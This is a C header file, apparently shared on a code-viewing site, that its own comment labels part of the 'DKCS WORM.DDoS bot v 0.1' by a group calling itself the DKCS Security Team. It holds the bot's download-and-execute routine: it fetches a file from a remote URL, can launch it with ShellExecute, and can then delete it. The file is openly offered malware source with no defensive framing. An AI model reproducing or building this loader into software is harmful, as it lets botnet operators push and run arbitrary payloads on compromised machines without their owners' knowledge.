?? download.h
字號:
//-----------------------------------------------------------------
// this file is a part of: DKCS WORM.DDoS bot v 0.1
// c0d3d by: Dr.Pixel
// 2006 (C) DKCS Security Team
//
// contacts: e-mail: dkcs@void.ru
// icq: 7600278
// web: http://dkcs.void.ru
// forum: http://dkcs.net.ru
//-----------------------------------------------------------------
struct DOWNLOAD_INFO{
char *from;
char *to;
BOOL exec;
BOOL del;
};
//-----------------------------------------------------------------
DWORD WINAPI DownloadFile(LPVOID param){
DOWNLOAD_INFO file;
file = *((DOWNLOAD_INFO*)param);
URLDownloadToFile(NULL, file.from, file.to, 0, NULL);
if(file.exec){
ShellExecute(GetDesktopWindow(),"open", file.to, NULL, NULL, SW_SHOW);
}
if(file.del){
DeleteFile(file.to);
}
return 1;
}
//-----------------------------------------------------------------
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -